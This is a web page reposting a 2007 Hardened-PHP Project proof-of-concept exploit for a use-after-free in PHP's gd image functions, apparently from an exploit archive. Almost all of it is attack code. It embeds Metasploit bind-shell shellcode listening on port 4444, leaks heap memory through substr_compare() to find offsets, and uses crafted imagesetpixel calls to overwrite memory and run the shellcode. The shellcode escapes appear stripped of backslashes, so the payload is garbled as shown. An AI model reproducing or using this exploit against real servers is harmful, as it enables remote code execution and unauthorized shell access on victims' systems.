Home / os / win10

MOPB-already.txt

Posted on 21 March 2007

<?php
////////////////////////////////////////////////////////////////////////
//  _  _                _                     _       ___  _  _  ___  //
// | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ | || || _  //
// | __ |/ _` || '_|/ _` |/ -_)| '  / -_)/ _` ||___||  _/| __ ||  _/ //
// |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
//                                                                    //
//         Proof of concept code from the Hardened-PHP Project        //
//                   (C) Copyright 2007 Stefan Esser                  //
//                                                                    //
////////////////////////////////////////////////////////////////////////
//             PHP gd already freed resource usage exploit            //
////////////////////////////////////////////////////////////////////////

// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");

// linux x86 bindshell on port 4444 from Metasploit
$shellcode = "x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46".
"x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f".
"x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6".
"xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06".
"x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc".
"xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d".
"x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65";

// Offsets used for the overwrite (will be overwritten by findOffsets()
$offset_1 = 0x55555555;
$offset_2 = 0x66666666;

findOffsets(); // Comment out if you want to just test the crash

class dummyclass { }

function myErrorHandler()
{
imagedestroy($GLOBALS['img']);

// Clipping
$GLOBALS['x'] = str_repeat(chr(0), 7311);
$GLOBALS['x'][7310] = chr(0x00);
$GLOBALS['x'][7309] = chr(0x01);
$GLOBALS['x'][7308] = chr(0x00);

$GLOBALS['x'][7307] = chr(0x7f);
$GLOBALS['x'][7306] = chr(0xff);
$GLOBALS['x'][7305] = chr(0xff);
$GLOBALS['x'][7304] = chr(0xff);

$GLOBALS['x'][7303] = chr(0);
$GLOBALS['x'][7302] = chr(0);
$GLOBALS['x'][7301] = chr(0);
$GLOBALS['x'][7300] = chr(0);

$GLOBALS['x'][7299] = chr(0x80);
$GLOBALS['x'][7298] = chr(0);
$GLOBALS['x'][7297] = chr(0);
$GLOBALS['x'][7296] = chr(0);

// True Color Image
$GLOBALS['x'][0x1c38] = chr(1);
// True Color Pixelmap (1st entry must be 0)
$GLOBALS['x'][0x1c3c] = chr(0x08);
$GLOBALS['x'][0x1c3d] = chr(0x80);
$GLOBALS['x'][0x1c3e] = chr(0x04);
$GLOBALS['x'][0x1c3f] = chr(0x08);

return true;
}

function poke($addr, $value)
{
$GLOBALS['img'] = imagecreate(1, 1);
imagesetpixel($GLOBALS['img'], $addr >> 2, new dummyclass(), $value);
}

function peek($addr)
{
$GLOBALS['img'] = imagecreate(1, 1);
return imagecolorat($GLOBALS['img'], $addr >> 2, new dummyclass());
}

printf("Using offsets %08x and %08x
", $offset_1, $offset_2);

error_reporting(E_ALL);
set_error_handler("myErrorHandler");
poke($offset_2, $offset_1);
unset($d);
















// This function uses the substr_compare() vulnerability
// to get the offsets.

function findOffsets()
{
global $offset_1, $offset_2, $shellcode;
// We need to NOT clear these variables,
//  otherwise the heap is too segmented
global $memdump, $d, $arr;

$sizeofHashtable = 39;
$maxlong = 0x7fffffff;

// Signature of a big endian Hashtable of size 256 with 1 element
$search = "x00x01x00x00xffx00x00x00x01x00x00x00";

$memdump = str_repeat("A", 18192);
for ($i=0; $i<400; $i++) {
$d[$i]=array();
}
unset($d[350]);
$x = str_repeat("x01", $sizeofHashtable);
unset($d[351]);
unset($d[352]);
$arr = array();
for ($i=0; $i<129; $i++) { $arr[$i] = 1; }
$arr[$shellcode] = 1;
for ($i=0; $i<129; $i++) { unset($arr[$i]); }

// If the libc memcmp leaks the information use it
// otherwise we only get a case insensitive memdump
$b = substr_compare(chr(65),chr(0),0,1,false) != 65;

for ($i=0; $i<18192; $i++) {
$y = substr_compare($x, chr(0), $i+1, $maxlong, $b);
$Y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
if ($y-$Y == 1 || $Y-$y==1){
$y = chr($y);
if ($b && strtoupper($y)!=$y) {
if (substr_compare($x, $y, $i+1, $maxlong, false)==-1) {
$y = strtoupper($y);
}
}
$memdump[$i] = $y;
} else {
$y = substr_compare($x, chr(1), $i+1, $maxlong, $b);
$Y = substr_compare($x, chr(2), $i+1, $maxlong, $b);
if ($y-$Y != 1 && $Y-$y!=1){
$memdump[$i] = chr(1);
} else {
$memdump[$i] = chr(0);
}
}
}

// Search shellcode and hashtable and calculate memory address
$pos_shellcode = strpos($memdump, $shellcode);
$pos_hashtable = strpos($memdump, $search);

if ($pos_shellcode == 0 || $pos_hashtable == 0) {
die ("Unable to find offsets");
}

$addr = substr($memdump, $pos_hashtable+6*4, 4);
$addr = unpack("L", $addr);
// Fill in both offsets
$offset_1 = $addr[1] + 32;
$offset_2 = $offset_1 - $pos_shellcode + $pos_hashtable + 8*4;
}
?>

 

TOP

Malware :

Exploits :